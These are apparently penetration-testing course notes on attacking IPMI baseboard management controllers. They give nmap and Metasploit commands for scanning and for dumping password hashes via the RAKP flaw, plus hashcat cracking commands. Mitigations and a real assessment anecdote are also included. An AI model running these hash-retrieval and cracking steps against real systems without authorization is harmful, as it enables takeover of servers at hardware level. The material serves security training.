IPMI

Table of Contents

• default passwords
• Flaw in RAKP protocol in IPMI 2.0 to get password hash
• Intelligent Platform Management Interface General Information
  • BMC

port UDP/623

nmap version scan -> sudo nmap -sU --script ipmi-version -p 623 ilo.inlanfreight.local

metasploit version scan -> msf6 > use auxiliary/scanner/ipmi/ipmi_version

default passwords:

It is also essential to try out known default passwords for ANY services that we discover, as these are often left unchanged and can lead to quick wins. When dealing with BMCs, these default passwords may gain us access to the web console or even command line access via SSH or Telnet.

Flaw in RAKP protocol in IPMI 2.0 to get password hash

During the authentication process, the server sends a salted SHA1 or MD5 hash of the user's password to the client before authentication takes place. This can be leveraged to obtain the password hash for ANY valid user account on the BMC. These password hashes can then be cracked offline using a dictionary attack using Hashcat mode 7300. In the event of an HP iLO using a factory default password, we can use this Hashcat mask attack command hashcat -m 7300 ipmi.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u which tries all combinations of upper case letters and numbers for an eight-character password.

> hashcat -m 7300 -a 0 ipmi.txt /usr/share/wordlists/rockyou.txt

There is no direct "fix" to this issue because the flaw is a critical component of the IPMI specification. Clients can opt for very long, difficult to crack passwords or implement network segmentation rules to restrict the direct access to the BMCs. It is important to not overlook IPMI during internal penetration tests (we see it during most assessments) because not only can we often gain access to the BMC web console, which is a high-risk finding, but we have seen environments where a unique (but crackable) password is set that is later re-used across other systems. On one such penetration test, we obtained an IPMI hash, cracked it offline using Hashcat, and were able to SSH into many critical servers in the environment as the root user and gain access to web management consoles for various network monitoring tools.

To retrieve IPMI hashes, we can use the Metasploit IPMI 2.0 RAKP Remote SHA1 Password Hash Retrieval module.

> use auxiliary/scanner/ipmi/ipmi_dumphashes

Intelligent Platform Management Interface General Information

• hardware-based host management systems
• Works independently of the host's BIOS, CPU, firmware, and underlying OS
• Ability to manage and monitor systems even if powered off or unresponsive
• operates using a direct network connection to the system's hardware
• does not require access via a login shell
• remote upgrades to systems without requiring physical access
• IPMI is typically used in three ways:
  • Before the OS has booted to modify BIOS settings
  • When the host is fully powered down
  • Access to a host after a system failure

BMC

• Systems that use the IPMI protocol are called Baseboard Management Controllers (BMCs). BMCs are typically implemented as embedded ARM systems running Linux, and connected directly to the host's motherboard. BMCs are built into many motherboards but can also be added to a system as a PCI card. Most servers either come with a BMC or support adding a BMC. The most common BMCs we often see during internal penetration tests are HP iLO, Dell DRAC, and Supermicro IPMI. If we can access a BMC during an assessment, we would gain full access to the host motherboard and be able to monitor, reboot, power off, or even reinstall the host operating system. Gaining access to a BMC is nearly equivalent to physical access to a system. Many BMCs (including HP iLO, Dell DRAC, and Supermicro IPMI) expose a web-based management console, some sort of command-line remote access protocol such as Telnet or SSH, and the port 623 UDP, which, again, is for the IPMI network protocol.